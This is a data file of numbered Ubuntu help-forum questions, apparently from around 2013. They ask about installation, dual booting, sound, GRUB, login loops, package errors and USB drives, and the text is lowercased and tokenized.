371137	problem installing ubuntu touch on galaxy nexus	i 've installed ubuntu touch on my galaxy nexus following the tutorial on the official site . however the latter is not so clear.. in particular , during the installation , user action on the phone is requested and not documented on the tutorial : 1 ) the phone asked me whether rebooting , wiping the cache or something else ( i did nothing and the phone rebooted ) 2 ) the phone asked me whether replacing or not cmw ( or something similar ) . i asked no.. after the installation all seemed to work correctly . however after shutting down the phone ca n't power on anymore ... when i push the power button the battery icon appears , showing that the battery is completely charged . what am i supposed to do ?
371140	why is my minecraft launcher not working ?	when i hit the play button , the exe file just closes and opens again . it only does this after i have installed a mod . the regular one works fine .
371143	ubuntu 13.04 ca n't update	when i try to update the system , by using the update aplication , i receive an error like : the packages installation or removal have failed . ! [ error ] [ 1 ] can anybody help me ? thanks . norberto p.s . i am not an advanced user
371144	having issues with live usb and unetbootin from an xp install	can i use wubi to install 13.10 and then use the wubi-move.sh to effect the full hdd image to ubuntu 13,10 no working cd drive and usb does n't want to boot from bios hence why i ask wubi has worked in the past but never knew of wubi-move.sh or lvpm back then ...
371145	unable to install ubuntu 12.04.03 server in vmware workstation 10	when i try to install ubuntu following the it does n't work . it starts normally asking for a language , then when i click on `` install ubuntu server '' my screen goes black and nothing happens . it never goes to the select your location and install language . same issue happens with 386 or amd64 version i follow this guide normally with success but not this time ! any idea ? ? thanks
371146	ubuntu server - virtual box ?	so i got virtualbox just for ubuntu server , i 'm currently running ubuntu 12.04 as my main os . but when i got everything set up in ubuntu server 12.04 , including my ports forwarded and a test minecraft server up ... i realized that nobody could join my public ip i sent out , not even me ! i can connect to the ipv4 address . it acts like i did n't forward my ports . but i forwarded 25565 to input and output and they 're both tcp and udp . is this just a virtual box issue or am i doing something wrong ? * using eth0 wired connection
371147	after upgrading to ubuntu 1310 i can not used a period	i upgraded to ubuntu 1310 and now the period does n't work on my keyboard does anyone know how i can fix this ? as always , i appreciate any feedback i receive , thank you for all of your help
371148	how to make whoopsie more silent ( log clutter with `` online '' messages )	i know what whoopsie is from the answers to what is the 'whoopsie ' process and how can i remove it ? i do not want to stop error reporting , as i think that error reporting is the minimum a user should do to try to help ubuntu . but since the upgrade to 13.10 , whoopsie has grown up quite chatty . i have literally hundreds of messages like that in my logs : sys : nov 4 14:40:48 samsung-romano whoopsie [ 1156 ] : online sys : nov 4 14:41:56 whoopsie [ 1156 ] : last message repeated 4 times sys : nov 4 14:42:56 whoopsie [ 1156 ] : last message repeated 2 times sys : nov 4 14:43:56 whoopsie [ 1156 ] : last message repeated 2 times sys : nov 4 14:44:56 whoopsie [ 1156 ] : last message repeated 2 times % zgrep whoopsie /var/log/syslog*gz | wc -l 773 is there a way to tell whoopsie to be less verbose ? ( the funny output format is from slogger , a homemade program to check system log files i wrote ages ago , but this is basically the content of /var/log/syslog file ) .
371152	application to turn screenshot ( ctrl+shift+prtscn ) into file	i want to be able to press ctrl+shift+prtscn - creates a partial screenshot - and save it automatically to file ( to attach to email , etc ... ) ... without installing a large application such as shutter or so . is there a quick way to do this ?
371153	how do i uninstall windows xp from my ntfs if i have ubuntu installed there as well	hello i installed ubuntu 13.10 alongside windows xp , now that i never use windows xp and i have almost no space for ubuntu ( i literally only have 136mb left ) i would like to uninstall it from my ntfs and reallocate the remaining space on my ntfs drive to ubuntu without damaging my ubuntu installation .
371154	what is hda driver with dkms ?	after scanning hardware drivers , i see hda driver with dkms , and it asks if i want to activate it . i googled it , but i can only find a generic description having to do with audio . can anyone tell me what specifically it 's for , and if i should activate ?
371158	ubuntu 12.04 - no sound - help !	i 'm panicking ... my sound stopped working after i tried to set-up my notebook speakers , plus two headphone jacks ... my idea was to multichannel the sound to 3 channels , built-in speakers , and sound-card 2 headphone jacks . after a couple efforts i did it with 2 channels , speakers and 1 headphone jack , but the other was n't working . after more tries and tries , sound stop working . i just want my sound back . and , if possible , but not necessary , a simple guide to active the 3 channels . xd i will post the diagnosis according to https : //help.ubuntu.com/community/soundtroubleshootingprocedure step 1 did it , still no sound . step 2 did it , still no sound . step 3 and # step 4 ( i removed the log cause there is a limit of characters to be posted . ) the log can be found here : https : //answers.launchpad.net/ubuntu/+source/alsa-driver/+question/238653 step 5 rebooted , still no sound . step 6 did it . in the output devices tab , nothing is muted . i play a music with the rhythmbox music player , i do n't hear anything but in the pavucontrol i can see in the built-in audio analog stereo a sound bar shaking ... but , no sound . step 7 in alsamixer , alsamixer v1.0.25 card : hda intel pch chip : creative ca0132 information view : f3 : [ playback ] f4 : capture f5 : all item : headphone [ db gain : 25.00 , 25.00 ] then , i have 5 columns headphone , speaker , pcm , s/pdif , s/pdif default pcm a little weird when i try to mute the headphone and the speaker , here what happens : starting both unmutted , mutting headphone cause speaker being mutted automaticaly . starting both unmutted , mutting speaker cause headphone being mutted automaticaly . starting both mutted , possible to unmute both separately . step 8 i can not hear sound on both ( headphone and/or speaker ) . step 9 dual boot ... restarted , windows was with sound at max volume . restarted again , still no sound at ubuntu . i heard something when ubuntu started , a little noise , then silence again . the sound icon always start mutted , after unmutting , i have no sound . step 10 i dont have this command in my ubuntu . step 11 tried at step 8 , no sound . there are no problem with jumpers or hardware , cause i have sound working on windows . step 12 no way to open my alienware and loss the warranty x.x '' step 13 i think it 's loaded , judging my the logs step 14 alienware m17xr4 , the hardware is listed in the logs above , at step 4 . there are two headphone hacks , one with just an headphone printed above , and the other with an headset ( with mic ) printed , there is a mic jack too , and a spdif ( optical ) too . step 15 i dont want to enable s/pdif step 16 i never used the hdmi output , yet ... thanks in advance . i hope i listed all the information you need .
371165	no hud results when alt+searching in 13.10	frankly , i 'm not actually sure how long this feature has n't been working for as i never used it much , but i upgraded to 13.10 recently and the hud does n't show any results for any applications . the dash is working great , no issues there . i 'm assuming i just need to uninstall and reinstall some package , but any idea what that package is ? thanks !
371167	use ubuntu phone os on a personal device ?	i am developing what essentially is a tablet but the size of a phone . i need an operating system because i have not acquired the skill set to develop my own operating system . does the os only work on predefined devices ?
371171	terminal commands for installing g++ 4.8 ?	could somebody please advise how i could install g++ 4.8 ? i understand its not an official release yet ( and that i would need to manually download a file ) but i get internal compiler bug issues with 4.7 and apparently the bug has been fixed in 4.8 . the problem is i do not know how to manually install g++ 4.8 when downloading the file etc . thanks in advance
371172	ubuntu broken after upgrade in uefi dual boot setup . howto reinstall	on my asus n56vz notebook i have a uefi multi boot setup with win7 , ubuntu 12.04 and mint 13 . this configuration has been working fine , so far . however , a few days ago i decided to upgrade ubuntu using `` sudo apt-get upgrade '' command . now i only get the command line when i boot into ubuntu . both win7 and mint are still booting fine . i 've read that i 'd end up with a cleaner os , if i choose to reinstall instead of upgrading . since i am experiencing problems with ubuntu already , i see no reason for keeping the current install . i am concerned about the other partitions , so i 'd appreciate some guidance on how to safely replace the broken ubuntu with a clean installation of 13.04 .
371181	why ca n't i watch dvds on my computer ?	i have a lenovo x200 with an external rw drive . when i put in a dvd , it opens to folders and the media 's pieces are there but you can not click them to get them to start . the gnome player will not play the dvd . i can not figure it out .
371183	i cant't install wine on lubuntu !	basically what happened was : i tried to install wine once and near the end of the installation , a wierd screen came up and said something about a font program . i could n't make it go away so i closed the terminal . then i reopened it and tried to download it again , but it said : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what does that mean ? ! ? will i ever be able to download wine ? help ! ! !
371187	how to increase the disk space of ubuntu 13.04 installed besides windows 7	i have installed ubuntu 13.04 besides windows 7 with initial space allocated as 18.2 gb . now i get a warning to increase the disk space and i wanted to increase the disk space for ubuntu . my total hard disk space is 320 gb and as seen from other posts , when i execute the following command in the terminal : sudo fdisk -l i receive the following response disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xcfc64c27 device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 7 hpfs/ntfs/exfat /dev/sda2 3074048 596467711 296696832 7 hpfs/ntfs/exfat /dev/sda3 596467712 625139711 14336000 7 hpfs/ntfs/exfat i ran df command and got he below response : xxx @ ubuntu : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/loop0 17753424 14090256 2754676 84 % / none 4 0 4 0 % /sys/fs/cgroup udev 1861852 8 1861844 1 % /dev tmpfs 374280 900 373380 1 % /run none 5120 0 5120 0 % /run/lock none 1871396 156 1871240 1 % /run/shm none 102400 28 102372 1 % /run/user /dev/sda2 296696828 58764616 237932212 20 % /host it seems like installed in /dev/loop0 but not showing up in gparted . please help me increase the disk space for ubuntu 13.04 . note : i coud n't see any gparted disk partitioner to make use of as observed in other threads .
371188	apt-get resolving hosts error	my every apt-get command ends with someting like this : err http : //security.ubuntu.com quantal-security release.gpg temporary failure resolving 'security.ubuntu.com' err http : //rs.archive.ubuntu.com quantal release.gpg temporary failure resolving 'rs.archive.ubuntu.com' err http : //rs.archive.ubuntu.com quantal-updates release.gpg temporary failure resolving 'rs.archive.ubuntu.com' err http : //rs.archive.ubuntu.com quantal-backports release.gpg temporary failure resolving 'rs.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //rs.archive.ubuntu.com/ubuntu/dists/quantal/release.gpg temporary failure resolving 'rs.archive.ubuntu.com' w : failed to fetch http : //rs.archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg temporary failure resolving 'rs.archive.ubuntu.com' w : failed to fetch http : //rs.archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg temporary failure resolving 'rs.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/release.gpg temporary failure resolving 'security.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead . i tried -- fix-missing , update , autoremove ... but problem stays
371190	how can i install ubuntu 13.10 alongside windows 8 ?	how can i install ubuntu 13.10 alongside windows 8 ? this option does n't appear in the installation menu
371191	what are the appropriate mount options for a shared ntfs partition on an ssd in a dual boot ubuntu/windows setup ?	i have ubuntu 13.10 and windows 7 installed in dual boot on a single ssd . in addition they share an ntfs partition where i put all my data and documents . what is the optimal way to mount this ntfs partition in /etc/fstab ( considering performance and minimizing wear of the ssd ) ? similar questions have been asked , but i could not find answers to this particular scenario . as i understand it , the mount option 'discard ' is not supported for ntfs and so should not be used ( although it is recommended here ) . another often quoted mount option is 'noatime ' . i use it for my ext4 partitions . does it apply to ntfs ? my current /etc/fstab line is : uuid=xxxxxxxxxxxxxxxx /dos ntfs defaults , nls=utf8 , uid=1000 , gid=1000 0 0
371192	ubuntu server/desktop system failure help ?	i recently had an ubuntu system running ubuntu server 12.04 and lubuntu 12.04 desktop . i ran some updates using the larger synamptic package collection of software . then i realized my system was giving me an unexpected and not very clearly described error - it just said it encountered a problem . so , i tried to go and remove a bunch of software that might have caused some problems . then i noticed it was starting up with a memtest screen . it kept going there . i tried to use the ubuntu server disk to do a restore and that did n't work . different dvds were all being seen as invalid media . then i tried using a usb thumbnail drive which i setup with a program on my windows pc . i kept telling it to boot from that media but it kept wanting to use the dvd drive . at one point , i realized i had to try reinstalling ubuntu server . i really only needed the server anyway on this machine and so , i do n't know why i installed the desktop . anyway , now , suddenly it seems to be not finding or recognizing a hard drive media . it said that if i chose to but the grub boot loader on /dev/sda/ that would be the best choice . it was seeing a few other media partitions on the hard drive ( just one drive is in there ) . these other media ( as in hard drive partitions - internal hard drive ) have device names that are variations of the system name that i had assigned the computer - which matches my business domain name . it almost seems that it is not seeing or recognizing the hard drive , as if it went bad . it seems a bit strange that this would happen . i had no indication the disk was going bad . none at all . usually , i can tell . plus it was telling me how much space i had for this new partition to be used with a second installation . can anyone recommend a way to test the drive . the system is a pentium d based system by gateway which ran a 64-bit version of ubuntu ( it is an all-in-one type system ) . also , if i have to reinstall a second copy of ubuntu , is there any way to get access to the mysql databases that were powering web apps , such as drupal ? i believe i had drupal 's backup and migrate module running , so there should be database exports - i sure hope so ... if i can even get access to the system and get it running again . thanks for any tips , sorry for the long post : - ( bruce
371194	ubuntu 13.10 gets stuck in a login loop	like the titel says : my ubuntu gets stuck in a login loop . earlier this day i tried to add the environment variable for java . i added to the file /etc/environment the path to my java distribution and everything worked out fine . an hour later when i tried to start the system , it got stuck in a login loop . i tried every proposition from this thread but non of them worked out . when i read out /.xsession-errors it says that it ca n't find the file 90environment , so maybe that 's part of the problem , but i have no idea how to solve it . i 'm new with ubuntu , so if there are any propositions , please explain them in an easy language .
371195	tried replacing lightdm with gdm , now computer wo n't start	after upgrading from 13.04 to 13.10 , i was having the problems described in this bug ( ie could n't mount a usb/cdrom and could n't use gui shutdown button ) https : //bugs.launchpad.net/ubuntu/+source/lightdm/+bug/851055 so i tried the solution given in post # 49 , which was : '' the easiest fix is to switch to gdm run these commands : sudo apt-get remove lightdm sudo apt-get install gdm then reboot . '' i did this and now ubuntu wo n't load ! just hangs on a purple screen with the ubuntu logo . please could someone help ? ! i am worried that i 'll lose all my files !
371196	how to change the selected item color in ubuntu 13.10 ?	how do i change the default orange to something else ? upon the update , the dconf setting has ceased to work . i can change certain apps ( gtk-2 ) using gnome color chooser , but other apps like libre office , gedit , and nautilus are still orange .
371197	triple boot ubuntu and windows	i have windows 7 and i installed ubuntu 12.04 inside it . now i want to install windows 8 in the same hard disk in different partition . how can i add ubuntu in windows 8 bootloader ? please note , i do not have separate partition for ubuntu . it 's inside windows 7 .
371199	ps3 controller on sixad disbales broadcom bluetooth	the recipe for breaking blue tooth is so far : fresh install - blue tooth is happy install broadcom drivers for wifi update to latest ubu install sixad run it once through and check ps3 controller is working . reboot bluetooth is dead or if i disable blue-tooth before reboot it wo n't come back either . latest stable ubuntu - inbuilt bluetooth module . hp probook 6470b . update running sixad via : sudo apt-add-repository ppa : falk-t-j/qtsixa sudo apt-get update sudo apt-get install sixad then : sudo sixpair sixad -- start and turning off bluetooth to disconnect the ps3 controller and ctrl c the terminal means bluetooth ca n't be reactivated . even after a reboot . help is appreciated ! i 'm very new to ubuntu so be gentle . update 2 reinstalling bluez , fixes it ...
371200	external usb hdd and unetbootin	can unetbootin create a bootable disk out of fat32 - formatted external hdd connected to pc via usb ? i had no problems making such disks in windows with universal-usb-installer , or yumi , but unetbootin wo n't do this in ubuntu 12.04 for me . is this at all possible ? if not with unetbootin , then maybe there are some other tool exists ?
371202	i ca n't update my ubuntu v12.04 updete manager problem	i have problem with my update manager its show this message [ url=http : //www.gulfup.com/ ? ntvkwp ] [ img ] http : //im40.gulfup.com/cgdxj.png [ /img ] [ /url ]
371204	how long does it take to get an package deb application reviewed for ubuntu ?	as the title . i thought a packaged deb application is a well package ubuntu application and it should be approved within a week . any time line or detailed instruction about a quickest approval . i found this http : //developer.ubuntu.com/publish/apps/other-forms-of-submitting-apps/my-apps-packages/ , and i am confused after i read it .
371205	compiz errors when restarting unity	so i 've been having problems with unity/compiz specifically 3 errors/warnings that i can not get fixed : compiz ( decor ) - warn : no default decoration found , placement will not be correct error : unity.glib-gio :0 g_file_monitor_set_rate_limit : assertion 'g_is_file_monitor ( monitor ) ' failed unity.session.gnome gnomesessionmanager.cpp:297 gnome session call failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files if i could get help with any of these it would be greatly appreciated !
371208	is it normal that programs do n't have title bar and borders in ubuntu with gnome3 ?	i installed ubuntu 13.10 saucy salamander , then i installed gnome 3 ( gnome-shell ) . i found a little bit strange that almost all windows does n't a title bar or border , however they have a close button . is that normal ? folders & files system monitor
371211	what is the syntax for the nautilus accels file ?	nautilus 3.8 can have its keyboard shortcuts customised through the ~/.config/nautilus/accels file . i see that the general syntax for this file is scheme , but what is the syntax for the keys specified ? eg . backspace vs backspace , slash vs a literal / , etc . how do write a ` ? where is this specified ?
371212	help with data recovery from a windows faliure	my ssd holding windows crashed and i am currently stuck trying to recover the data from my 750gb hdd . i am using gparted to do this , and the drive with all my important data on it is not mounting . here 's a screenshot of the screen and error : i 'm no expert , but it looks to me like i might have a major problem with this data recovery . any suggestions are appreciated .
371213	how to delete fonts in ubuntu	how to delete fonts in ubuntu . i am a new ubuntu user and find it hard to delete fonts that i have installed . i anticipate that the problem might be installing font that turns my firefox browser turned my mail fonts to bold . i experience the same view with firefox and chrome browser . many of the fonts turned out to be bold . !
371214	grub does not see windows 7 after being fixed	after i installed ubuntu on a separate hdd for someone , i was unable to boot into windows or the grub option without entering grub rescue . and after i tweaked /etc/default/grub , i am able to enter into grub , but grub will not recognize windows 7 which is installed on my main drive . how can i get grub to boot into windows ? ubuntu and windows are both on separate drives .
371215	installing unity system tray plugins in xubuntu	i 'm very new to linux and was using ubuntu with the unity desktop . i was looking around online and have fell in love with xubuntu desktop environment , so i downloaded the iso and did a clean install of xubuntu . although i love the desktop there is only one thing missing ... i would love to import the volume , messaging , network system tray icons as i found these invaluable , and here is my problem i ca n't seem to find a way to do this . i also ca n't seem to get qbittorrent to minimize to the system tray i have configured it in the programs settings but it just wo n't play ball ... thanks for listening i hope i 'm just silly and there is a simple solution to all this
371218	ubuntu 13.10 osd brightness flicker	i 've just upgraded from 13.04 to 13.10 on an msi wind . i 've ran into a problem , and have n't found a resolution . the brightness on screen display seemingly randomly pops up on the screen . it flickers between full on and full off . the screen itself does n't flicker , but the osd widget for it does . i ca n't get it to stop . the persistent flickering notification causes problems with the menu .
371220	usb drive inaccesible in ubuntu 12.04	i 'm running 64-bit ubuntu 12.04 ( kernel 3.2.0-55-generic ) . i have a 32gb usb drive which i 'm unable to mount on this system . any help appreciated . the usb drive shows up as /dev/sdb in the 'disks ' utility as device=/dev/sdb but no entry for media , size and contents . even dmesg shows the usb device as attached ( but not mounted ) to sdb : root @ ms-dell : /media # dmesg | tail [ 74087.307755 ] usb 3-1 : new high-speed usb device number 19 using xhci_hcd [ 74087.476039 ] scsi22 : usb-storage 3-1:1.0 [ 74091.448070 ] scsi 22:0:0:0 : direct-access generic usb sd reader 0.00 pq : 0 ansi : 2 [ 74091.450061 ] sd 22:0:0:0 : attached scsi generic sg1 type 0 [ 74097.787512 ] sd 22:0:0:0 : [ sdb ] attached scsi removable disk however , fdisk -l does not show the disk root @ ms-dell : /media # fdisk -l disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3e828130 device boot start end blocks id system /dev/sda1 2048 616447 307200 de dell utility /dev/sda2 616448 6907903 3145728 c w95 fat32 ( lba ) /dev/sda3 * 6907904 468371455 230731776 83 linux /dev/sda4 468373502 500117503 15872001 5 extended /dev/sda5 468373504 500117503 15872000 82 linux swap / solaris root @ ms-dell : /media # nor does the nautilus . i initially thought mbr to be corrupted so tried to fix it using dd but got the following error : root @ ms-dell : /media # dd if=/dev/zero of=/dev/sdb bs=512 count=1 dd : opening `/dev/sdb ' : no medium found is there a way to repair the usb drive and access its contents ?
371221	how can i sync my ipad with ubuntu 12.04.3 lts ?	i have an ipad 3rd generation , it 's called the new ipad , and i do n't know how can i sync with my pc . i 'm now using ubuntu 12.04.3 lts . thanks a lot !
371222	how to download and install ibm lotus sametime connect 8.5.2 on ubuntu 13.04 64bit	where can i get ibm lotus sametime connect 8.5.2 for 64-bit ubuntu 13.04 and how to install it ?
371226	i ca n't connect to wifi	i recently downloaded ubuntu 13.10 on my laptop and i have n't been able to connect to wifi yet . it shows that my connection is excellent but when i try to connect it tries to connect for 15 seconds , then says connection lost . wifi worked when i was running win8 so i do n't know what 's wrong .
371229	external monitor behavior	can ubuntu 13.10 not automatically turn off one of the monitors temporarily when an external monitor is plugged into the laptop , and also automatically switch back to laptop monitor when the external monitor cable is unplugged ? like what windows does ? i do not wish to permanently switch off the laptop monitor . i have a laptop with a hdmi monitor plugged into it .
371230	lenovo ideapad y510p - blank screen	i 'm trying to install ubuntu ( 13.10 ) on the lenovo ideapad y510p , but all i 'm getting is a blank screen after i select install/try ubuntu . is there any way to fix that ? ( fn+up has no effect ) edit : after removing my second videocard ( appears linux does n't support sli , it crashes with second card present ) and disabling `` quiet '' and `` splash '' it now crashes with `` divide error : 0000 [ # 1 ] smp ''
371235	using imac running ubuntu as a display for a mac mini	i have an imac running ubuntu , and a mac mini running osx . i would like to use my imac as a display for the mac mini by using using a target-disk mode equivalent for ubuntu . i have my imac and mac mini connected to each other via a thunder bolt cable . how would i use my imac as a monitor for the mac mini ?
371240	is there a terminal command that will click the mouse ?	i am looking for a way to click the mouse , as it is in its current location or in a specific location on the screen , after x minutes . is there any way to do this with a terminal command ( preferably with the programs ubuntu has installed by default ) ?
371241	how to trigger offline data collection with smartmontools ?	i just purchased a new ssd and i 'm trying to figure out how to monitor the expected lifetime of it . when i run sudo smartctl -a /dev/sda it reports ... general smart values : offline data collection status : ( 0x80 ) **offline data collection activity was never started** . ... furthermore i note that some of the statistics are indicated to be updated `` always '' or `` offline '' : $ sudo smartctl -data -a /dev/sda ... id # attribute_name flag value worst thresh type updated when_failed raw_value ... 198 offline_uncorrectable 0x0030 100 100 001 old_age **offline** - 0 199 udma_crc_error_count 0x0032 100 100 001 old_age **always** - 0 202 **perc_rated_life_used** 0x0018 100 100 001 old_age **offline** - 0 206 write_error_rate 0x000e 100 100 001 old_age **always** - 0 does this mean that the `` offline '' stats are not up-to-date ? will the `` offline '' stats update themselves with time , or need i trigger them to update somehow ? i am particularly interested in the value indicating the lifetime of the ssd , `` perc_rated_life_used '' , which is labeled as `` offline '' . this is on a newly updated ubuntu 13.10 system .
371244	opening terminal leads to no edid issue	so here 's the latest in my ubuntu saga : i 've got an hp dv9925nr running ubuntu 12.04 lts . after getting the wireless issue fixed , i let the os update my drivers , including an nvidia driver . after the install , i rebooted , and i got boot into a blank screen . several hours of chasing my tail in the forums here introduced me to grub , and this post . question 1 : when i edit something in grub , how do i save it ? i edited the `` quick splash '' to `` nomodeset '' five times and every time i went back to that screen , it was back to `` quick splash '' . moving on , as i tinkered with the machine and none of the options worked , i tried logging into the guest account . it worked ! ! ! ( hey , i was amazed ) . i switched user to my account , and got the same login-loop ( enter pw , see the screen flicker , go black , then back to login screen ) and switched back to guest . i deleted my account , added a new account with the same name and admin privileges , and i 've been setting up that new account . now when i open terminal ( ctrl+alt+f1 ) ( q3 ) i get a running error that says , `` no edid for vga-1 '' . i 've searched all over this forum , but i have n't found anything that would point me to a solution . question 2 : what is `` no edid for vga-1 '' and how do i fix it ? question 3 : is there a difference between terminal ( ctrl+alt+t ) and tty1 ( ctrl+alt+f1 ) ? for now , i 'll leave things as they are , and we 'll see if i can keep this machine running long enough to accomplish something .
371247	dual monitor with crossover 2560x1440	i 'm having a couple problems with ubuntu 13.1 . most important : my desktop has 2 monitors . one 2560x1440 and the other 1920x1080 . i have currently done a fresh install of ubuntu 13.1 if i boot into unix normally , everything works fine . though , i want my 2nd monitor to go in portrait mode . if i do that , my main monitor ( 1440p ) goes black . i am unable to bring this monitor back online no matter what i do . this only happens when i change my 2nd monitor to be in portrait mode . not so important : when i use my mouse ( rat 7 mmo ) , sometimes , any text box that i 'm currently focused in becomes unfocused , and then re-focused about 10 seconds later . this interval infinitely repeats . additionally , with my multi-monitor setup , using my mouse and clicking `` displays '' will make the mouse unable to perform any clicks ( left , right , or middle ) until i unplug and replug it . ( connected via usb ) this `` fix '' only works about 1/4th of the time .
371248	no dual boot menu	i formatted all of my disk and installed ubuntu on my computer . i immediately partitioned , from an ubuntu live cd , my hard drive , creating an ntfs partition for for windows . after successfully doing so , i went on to install windows 8.1 . after i installed windows 8 in the new partition and turned off my pc and turned it on again the option to chose which operating system i wanted to use did n't appear , loading windows like if ubuntu did n't exist . how can i have the option to chose which operating system i want to run or at least from which partition to boot from when i start my computer ? everything is okay with my operating system the only thing i need is for ubuntu to appear as an option on the boot menus
371250	how to write to data to copy and paste buffer ?	how do i write data from the command-line into the copy paste buffer ? i see the programs xsel , and xclip and they look fine , but i would prefer a command line option . can i redirect terminal output to the buffer some how ? what is the technical name for the copy paste buffer ? i use mate for the desktop environment . the reason i want to be able to do this without installing anything is i want to be able to write scripts to use this function even on systems where i am not an administrator ... i know i can compile in my home directory , but i would still prefer a standard output method . i wouldnt mind writing a bit of c-code to do it either . i am still not certain , perhaps the copy paste buffers are just frame buffers ?
371253	hidden files wont stay hidden in ubuntu gnome	whenever i open the home folder , all the hidden files are displayed along with unhidden files . i hit ctrl+h and they disappear , but they are visible again when i open home again . i 've tried de-selecting `` show hidden files '' from the dropdown menu , but it has the same result . i 'm using ubuntu gnome 13.10 .
371254	windows 8 dual boot problem	i have windows 8 on a dell xps 12 . i just reinstalled windows 8 and have legacy boot , not longer uefi . i used wubi and installed ubuntu . the laptop restarts . i chose ubuntu and the screen turns purple for a second and i hear a beat and then the screen goes black and nothing happens . did i do something wrong ? also secure boot and quick boot .
371255	looking for a disk manager that has options for setting allocation sizes in paritions	i 'm looking for a gui program that is compatible with ubuntu 13.10 - server x86-64 that has all the features of gparted but also allows for setting custom allocation sizes when creating a partition . eg : ability to create a 4gb fat32 parition with 32 kilobyte allocation size . please do n't suggest a terminal only application , no matter how awesome it might be , because that 's not what i asked . wow , i come off like a right up prick when i write , eh ?
371257	dependency problems now not able to install or remove any package	i was installing wvdial , now i do not need that , but because of that machine got problem with dependencies , and due to that i am unable to install any package , please help , below is my stack trace : the following packages have unmet dependencies : libqt3-mt : i386 : depends : libjpeg62 but it is not installed libusb-dev : depends : libusb-0.1-4 ( = 2:0.1.12-14 ) but 2:0.1.12-20 is installed dependency problems : i386 : depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10.4 is installed depends : libuniconf4.4 but it is not installed depends : libwvstreams4.4-base but it is not installed depends : libwvstreams4.4-extras but it is not installed depends : libxplc0.3.13 but it is not installed depends : ppp ( > = 2.3.0 ) but it is not installed
371261	display monitor info via command line	is there a way to query monitor information from command line ? for example , get monitor model , similar to e.g . what lspci does for graphic card info , or whether it 's currently on or off , things like that . if possible , what kinds of basic information such as the above can be easily gathered ? for example , is it possible to determine if monitor is in portrait or landscape position ? or if it has built-in speakers or not ? command line is the preference , but if there 's a gui method , i 'd like to hear about it , too .
371267	13.10 can not login to ubuntu default desktop environment - must use gnome flashback or cinnamon	on boot at the password prompt - after i enter my password i get some error popup which disappears too fast to see then it reverts back to same password login greeter screen . same screen has icons where i can choose : select desktop environment cinnamon gnome flashback ubuntu i really want to login to the normal ubuntu 13.10 unity using above ubuntu , however i can successfully login using either : cinnamon or gnome . suggestions ? i have researched around and no help after removing file ~/.xauthority also i see this : cat .xsession-errors script for cjkv started at run_im . script for default started at run_im . init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd respawning too fast , stopped
371278	grub menu will not show the first time i try to boot my ubuntu server 12.04 after it is shutdown for a long time	i am running into a booting issue after installing ubuntu server 12.04 lts . following is the symptom of the problem . system description : dual core amd athlon 64 3 disks : two sata ( out of which one is ssd ) and one pata . using lvm for disk partition management . /boot is not under lvm rest of the partitions are . / is on the ssd bios boot sequence is correct and points to the disk with /boot and boot loader is installed on this disk . symptoms : post messages blinking cursor on first line then moves to second line screen flickers then becomes black everything is unresponsive , hard reboot post messages will not show up on screen . monitor displays powersave message force shutdown machine again . shutoff power to machine for a few minutes . restart machine . post message show up . grub menu shows up ubuntu server 12.04 boots normally . from now on ubuntu server boots normally until machine is shutdown for a long time ( for example , 30 mins ) repeat steps 1 through 13 once the machine is started after a long time . what did i try ? i read several posts and have tried : radeon.modeset=0 setting the gfxmode edd=0 nolacpi boot-repair nothing seems to work . in my search i did see only one post with this same symptom . unfortunately , i am not being able to locate that post anymore . the interesting fact is that with this same machine configuration , if i install ubuntu desktop 12.04 then everything works fine . any help will be appreciated .
371288	ubuntu 13.10 - gnome-shell dims screen after inactivity	i 've gone to settings > power and set `` blank screen '' to `` never '' but it still fades to black after about 15 minutes . is there another option i am missing ? ubuntu 13.10 gnome edition running gnome 3.10.1 .
371289	slow p2p sharing in ubuntu	hi after installing ubuntu i found that my download speed , specifically torrent download speeds has gone surprisingly lower than before , i 'm not really familiar with configuring network on ubuntu/linux so can anyone please help me with that ? and how can i check the problems/speeds of my dns server i guess its a problem with that .
371290	how can i install gnome2 on recent versions of ubuntu ?	how can i install gnome 2 on ubuntu 13.10 - server x86-64 ? i 'm aware this is not an easy question given many of the dependencies of gnome 2 have been upgraded in 13.10 and therefore cause a problem , i discovered this when i tried using the 10.10 repos with my 13.10 install . please do n't suggest alternatives , i 'm aware of them .
371296	13.10 login loop , multiple solutions failed	fixed at bottom i just installed ubuntu 13.10 from a live cd via live linux usb creator . it installed with no errors . i put an encryption password on the hard drive , then created my user account with a password . all of the installation was completed and the computer restarted . back at the logon screen , i see `` nedryos '' , guest , and remote login . i click on nedryos and enter my password and hit enter . in the space of less than a second the following happens : a loading circle appears in the password box . i assume this is normal . the login screen disappears and goes black . i have no idea if this is normal vertical white lines flash on the right side of the of the screen , about a third of the width of the screen then disappear very small white dots , or perhaps < 10 pixel wide lines ( definitely smaller than the text entry line that appears on the console ) flash across the whole screen , but not in any apparent pattern the top two lines ( character size lines i mean ) appear with red lines across the width of the screen there are two beeps , that are very freaking loud , by the way . they are the same that happen when the login screen first appears . back to the logon screen . well , crap . things i 've tried so far : guest session -- works normally , including internet access with firefox putting in an obviously wrong password -- `` invalid password '' appears restarting using this method ( including remounting ) setting the password to `` 1 '' -- same issue as before reinstalling ubuntu 13.10 from the 